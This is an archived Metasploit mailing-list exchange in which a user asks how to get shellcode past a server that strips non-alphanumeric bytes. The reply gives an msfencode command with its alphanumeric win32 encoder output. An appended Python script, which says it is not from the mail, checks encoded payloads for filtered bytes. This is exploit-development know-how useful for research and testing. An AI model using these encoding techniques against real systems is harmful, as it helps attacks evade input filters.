Metasploit mailing list archives

Opcode db suggestion and msfencode question


From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 25 May 2005 09:10:47 -0500

On Wed, May 25, 2005 at 04:51:53PM +0200, RaMatkal wrote:
> Great work on 2.4!
>
> A quick suggestion and a question....
>
> The opcode database is terrific! A really nifty addition to the opcode db would be the ability to specify bad
> characters to filter from the return addresses....For example, only show those return addresses whose ascii values
> are valid alphanumeric characters....

This is a good suggestion; we'll look into adding it at some point in
the future.  Thanks!

> Now for my question....I'm trying to exploit a server which filters all non-alphanumeric characters.....in order to
> land on my encoded shellcode, I need to do a couple of jumps....since 'eb' and 'e9' are filtered I figure I can
> encode the jumps with msfencode...
>
> Has anyone done this before or have any neat advice on how to do JMPs when only alphanumeric chars are valid..
>
> I tried putting an 'eb 06' into <filename> and then trying:
>
> /msfencode -i <filename> -e PexAlphaNum
>
> but got back a 79 byte payload which still contained a couple of 'eb's (obviously needed for the encoder function
> at the beginning right?)....

Well, assuming you are exploiting something on win32, you can use an
entirely alphanum geteip.  Other platforms rely on a small non-alphanum
stub to get eip which can generally lead to problems.  Here's an
example:

$ perl -e 'print "\xcc"' | ./msfencode -e PexAlphaNum GETPCTYPE=win32
[*] Using Msf::Encoder::PexAlphaNum with final size of 123 bytes
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68".
"\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44".
"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6a\x30\x50\x50\x54".
"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x5a";

Give that a shot and see if it works for you.
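The 79-byte result the poster got back is exactly the case where a quick byte-class check saves a failed attempt: the server-side filter described above accepts only alphanumeric bytes, so the same check applied to the encoder's output tells you up front whether any byte (such as a leftover `eb`) would be rejected. The following is an added example, not code from the mail or from Metasploit; it assumes only the Perl-style `"\x.."` output format that msfencode prints above, and the constructed two-byte sample at the bottom stands in for the unencoded `eb 06` the poster tried.

```python
import re
import string

# The byte classes the filter in the thread accepts: ASCII letters and digits.
ALNUM = frozenset((string.ascii_letters + string.digits).encode())


def parse_perl_hex(text: str) -> bytes:
    """Turn msfencode's Perl-style output ("\\x56\\x54"... lines joined
    with '.' and ended with ';') back into the raw payload bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(payload: bytes, allowed=ALNUM):
    """Return [(offset, byte), ...] for every byte outside the allowed set.
    An empty list means the filter described in the mail would pass it."""
    return [(i, b) for i, b in enumerate(payload) if b not in allowed]


def is_clean(payload: bytes, allowed=ALNUM) -> bool:
    return not find_bad_chars(payload, allowed)


def summarize(payload: bytes, allowed=ALNUM) -> dict:
    """Small report a reviewer can eyeball: size, offending bytes, and the
    printable rendering of the payload (non-allowed bytes shown as '.')."""
    bad = find_bad_chars(payload, allowed)
    return {
        "size": len(payload),
        "bad_count": len(bad),
        "bad": [(off, f"{b:02x}") for off, b in bad],
        "printable": "".join(chr(b) if b in allowed else "." for b in payload),
    }


# The 123-byte PexAlphaNum output quoted in the mail above, copied verbatim.
MSFENCODE_OUTPUT = r'''
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68".
"\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44".
"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6a\x30\x50\x50\x54".
"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x5a";
'''

# Constructed sample: the raw short jump ("eb 06") the poster tried to feed
# to msfencode, followed by a few alphanumeric filler bytes. Not from the mail.
RAW_JMP_SAMPLE = b"\xeb\x06" + b"ABCD"


if __name__ == "__main__":
    encoded = parse_perl_hex(MSFENCODE_OUTPUT)
    print("msfencode output:", summarize(encoded))   # bad_count 0, size 123
    print("raw jmp sample:  ", summarize(RAW_JMP_SAMPLE))  # flags offsets 0 and 1
```

Run it as-is to see the quoted win32 GETPCTYPE output pass with zero bad bytes, while the raw jump is flagged at offsets 0 and 1; pointing `parse_perl_hex` at your own msfencode output (or passing a different `allowed` set, for instance when the filter also strips specific letters) is the check to do before assuming an encoding round-trip will survive the filter.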
